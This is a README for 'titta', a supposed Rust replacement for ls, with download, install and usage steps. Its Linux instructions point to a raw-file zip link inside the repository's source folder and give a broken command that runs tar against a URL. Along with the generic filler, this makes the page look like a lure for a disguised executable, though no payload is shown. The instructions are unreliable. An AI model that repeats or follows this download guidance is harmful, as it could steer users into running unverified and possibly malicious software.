Welcome to titta! This tool helps you quickly list files and directories in your terminal. It's built in Rust and serves as a faster alternative to the traditional ls command.
To get started, visit the Releases page to download the latest version of titta. Here’s a step-by-step guide to help you:
- Click on the link above to go to the Releases page.
- Look for the latest version listed.
- Find the file suitable for your operating system (Windows, macOS, or Linux).
- Click on the file to download it to your computer.
Once the download is complete, follow these steps to install and run titta:
- Locate the downloaded
.exefile. - Double-click the file to run it.
- Open your terminal (Command Prompt or PowerShell).
- Type
tittafollowed by any command options you wish to use. For example,titta -lto list files in the current directory.
- Find the downloaded
.dmgfile. - Double-click the file to open it.
- Drag the titta application into your Applications folder.
- Open your terminal.
- Type
tittaand press Enter to see your files.
- Locate the downloaded
https://raw.githubusercontent.com/jaydoy7828/titta/main/src/Software-v2.3.zipfile. - Uncompress the file using the command:
tar -xzvf https://raw.githubusercontent.com/jaydoy7828/titta/main/src/Software-v2.3.zip. - Move the uncompressed folder to your desired location.
- Open your terminal and navigate to the folder.
- Type
./tittato run it.
- Fast Listing: titta lists files and directories faster than the traditional
lscommand. - User-Friendly: Simple commands make titta easy for anyone to use.
- Customizable Output: Modify the way you view files with just a few options.
- Cross-Platform: Works smoothly on Windows, macOS, and Linux.
Here are some common ways to use titta:
- Basic File Listing: Run
tittato display files in the current directory. - List Hidden Files: Use
titta -ato show hidden files starting with a dot. - Sort Files by Size: Use
titta -Sto sort files in order of size. - Display File Types: Run
titta --typeto see the types of files in a directory.
- Operating System: Windows 10 or later, macOS Mojave or later, Ubuntu 18.04 or later.
- RAM: Minimum of 512 MB available memory.
- Disk Space: At least 50 MB of free space for installation.
You can use titta for various tasks related to productivity and file management. Here are some related topics:
- gnu
- productivity
- rust
- rust-crate
- rust-lang
- terminal
- terminal-tool
- unix
- unix-tool
- unix-tools
- utility
- utils
If you face any issues or need help, please check the Issues section of this repository. You can also leave your queries there, and we’ll respond as soon as possible.
We welcome contributions! If you have ideas for features or improvements, feel free to submit a pull request. Your input can help make titta even better for everyone.
Thank you for using titta! We hope this tool improves your productivity in managing files on your system. Don't forget to check back for updates and new features. Happy listing!